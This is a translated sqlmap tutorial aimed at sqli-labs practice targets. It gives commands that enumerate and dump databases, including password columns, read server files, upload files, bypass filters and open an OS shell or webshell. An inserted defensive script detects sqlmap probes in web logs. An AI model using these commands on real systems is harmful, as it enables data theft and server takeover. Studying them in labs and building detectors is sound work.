sqlmap injection basics course

Another author's summary: https://www.cnblogs.com/ichunqiu/p/5805108.html

Basic sqlmap commands:

python sqlmap.py -u "http://xxxxx/x?id=1" --dbs (or --current-db)
python sqlmap.py -u "http://xxxxx/x?id=1" -D database_name --tables
python sqlmap.py -u "http://xxxxx/x?id=1" -D database_name -T table_name --columns
python sqlmap.py -u "http://xxxxx/x?id=1" -D database_name -T table_name -C "id,user,password" --dump

Parameters used

- --technique: sqlmap injection technique
- --batch: accept the default choices and run without prompting
- --current-db: current database
- --current-user: current database user name
- --is-dba: check whether the current user has DBA (administrator) privileges
- --data: POST data to inject into
- --threads: maximum number of concurrent threads (do not exceed 10)
- -r: load the HTTP request from a .txt file
- --cookie: cookie value to inject into
- --level: detection level; 3 is usually best, 5 is the most comprehensive
- --sql-shell: run custom SQL statements
- --os-shell: run operating system commands
- --file-read: read a file from the database server
- --file-write "local path" --file-dest "server path": upload a file
- --tamper: bundled scripts for bypassing filters

0x01 --technique parameter

--technique selects sqlmap's injection technique; sqlmap supports 5 different injection modes:

B: Boolean-based blind
E: Error-based
U: UNION query-based
S: Stacked queries (required when sqlmap reads the file system, runs operating system commands, or accesses the registry; multiple statements can be injected)
T: Time-based blind

Example sqlmap command:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-5/?id=1" --technique E --dbs --batch
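Seen from the defender's side, each technique letter above corresponds to a recognisable payload shape in the web server's access log. The following is an added example, not part of the original post and not sqlmap's own code: it parses constructed Apache/nginx combined-format log lines and reports, per client IP, which technique signatures appeared, whether sqlmap's default User-Agent was seen, and whether the request volume looks automated. The sample lines, IPs and the rate threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# One payload signature per sqlmap --technique letter (case-insensitive).
TECHNIQUE_SIGNATURES = {
    "B": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),              # Boolean-based blind
    "E": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),           # Error-based (MySQL)
    "U": re.compile(r"\bunion\b.*\bselect\b", re.I),                     # UNION query-based
    "S": re.compile(r";\s*(select|insert|update|delete|drop)\b", re.I),  # Stacked queries
    "T": re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\b", re.I),    # Time-based blind
}

# Combined log format; the final quoted field is the User-Agent.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def classify_request(path, user_agent):
    """Technique letters found in the URL-decoded path, plus 'UA' for sqlmap's default User-Agent."""
    decoded = unquote_plus(path)
    hits = {letter for letter, rx in TECHNIQUE_SIGNATURES.items() if rx.search(decoded)}
    if "sqlmap" in user_agent.lower():
        hits.add("UA")
    return hits

def scan_log(lines, rate_threshold=10):
    """Per-IP findings; 'suspicious' means any signature hit or a burst of >= rate_threshold requests."""
    per_ip, counts = {}, Counter()
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        counts[m["ip"]] += 1
        per_ip.setdefault(m["ip"], set()).update(classify_request(m["path"], m["ua"]))
    return {ip: {"techniques": sorted(hits - {"UA"}),
                 "sqlmap_ua": "UA" in hits,
                 "requests": counts[ip],
                 "suspicious": bool(hits) or counts[ip] >= rate_threshold}
            for ip, hits in per_ip.items()}

# Constructed sample log: three probes from one client, one normal request from another.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2019:10:00:01 +0000] "GET /Less-5/?id=1%20AND%201=1 HTTP/1.1" 200 512 "-" "sqlmap/1.3.10#stable (http://sqlmap.org)"',
    '203.0.113.5 - - [10/Oct/2019:10:00:02 +0000] "GET /Less-5/?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "sqlmap/1.3.10#stable (http://sqlmap.org)"',
    '203.0.113.5 - - [10/Oct/2019:10:00:03 +0000] "GET /Less-5/?id=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2019:10:00:04 +0000] "GET /Less-5/?id=7 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

Because the User-Agent is trivially changed (the -r and --user-agent usage later on this page does exactly that), the payload signatures and the per-IP request rate are the more reliable signals; the UA match is only a bonus.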

0x02 --data and --threads parameters

For POST injection, put the POST data after --data; --threads speeds up the run, but should not exceed 10.

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/?id=1" --data "uname=1&passwd=11&submit=Submit" --technique UES --dbms mysql --dbs --threads 8

0x03 -r parameter

Put the contents of the HTTP request packet in a txt file (the cookie can be left out), then pass the path of the txt file to -r and sqlmap runs automatically. Note that you may need to append a "*" symbol after the value of the request parameter that should be injected.

python sqlmap.py -r 1.txt --dbs --threads 8 --technique BTES
or 
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-18/" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*" --level 4 --dbs --threads 10 --technique BEST

If you know the exact location of the SQL injection, you can use the second form directly.

0x04 --cookie parameter

For web applications that authenticate with a cookie, the cookie can be specified for the POST request, and the cookie can also be used as the injection parameter.
sqlmap -u "url" --cookie="..." --level 3 --dbs

0x05 --os-shell parameter

If the database user has administrator privileges and the path of the web root directory is known, this parameter can be used to upload a webshell and get a reverse shell.

Check for administrator privileges with --is-dba.

0x06 --file-read parameter

If you know the path of a fixed file on the site, or of a file inside the web server, you can use this parameter to read the file's contents:

python sqlmap.py -u "http://127.0.0.1/?id=1" --file-read "C:/windows/win.ini"

0x07 --file-write and --file-dest parameters

--file-write "local path of the file to upload" --file-dest "server root directory path": these parameters can be used when the site has a SQL injection and the site's root directory is known.

0x08 --tamper parameter

--tamper scripts are used when some parameters are filtered; sqlmap comes with a number of bypass scripts.

python sqlmap.py xxxx --tamper "module name"


Source: www.cnblogs.com/-chenxs/p/11671299.html